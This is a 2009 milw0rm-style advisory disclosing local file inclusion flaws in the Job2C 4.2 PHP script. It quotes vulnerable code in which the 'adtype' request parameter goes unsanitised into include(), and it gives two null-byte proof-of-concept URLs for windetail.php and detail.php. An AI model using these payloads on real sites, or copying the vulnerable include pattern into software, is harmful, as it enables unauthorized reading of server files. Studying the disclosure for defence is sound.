Job2C 4.2 (adtype) Local File Inclusion Vulnerability :

Date : 2009-04-15 Author : ZoRLu
[~] Job2C version 4.2 (adtype) MulTiple LFi
[~]
[~] Script: http://www.w2b.ru/download/Job2C.zip
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 15.04.2009
[~]
[~] Home: yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com 
[~]
[~] contact: [email protected]
[~]
[~] N0T: Herkes Hecker Olmus :S yav siktirin gidin mal mal gelip msn de konusmayIn :S Herkes Ustune AlInmasIn anlayan anladI :S
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------

file: 

windetail.php

err0r c0de:

$adtype=$_REQUEST["adtype"];
$id=$_REQUEST["id"];                 ( err0r c0de 1 )
$title=$_REQUEST["title"];

	winHead($title);
	include("lib/".$adtype.".inc");    ( err0r c0de 2 )
	
exp 1:
	
yildirimordulari.com/script/windetail.php?adtype=LFÝ%00

file:

detail.php

err0r c0de:

$mode=$_REQUEST["mode"];
$adtype=$_REQUEST["adtype"];         ( err0r c0de 1 )
$id=$_REQUEST["id"];
$auth=$_SESSION["auth"];
include("conf/conf.inc");
include("lib/lib.inc");
include("lib/addlib.inc");
include("templates/header.inc");
if(!$adtype)$adtype="res";

	include("lib/".$adtype.".inc");    ( err0r c0de 1 )	
	

exp 2:

yildirimordulari.com/script/detail.php?adtype=LFÝ%00


[~] ----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & stack
[~]
[~] yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com
[~]
[~] ----------------------------------------------------------------------

# milw0rm.com [2009-04-15]

C1

 

C2

 

C3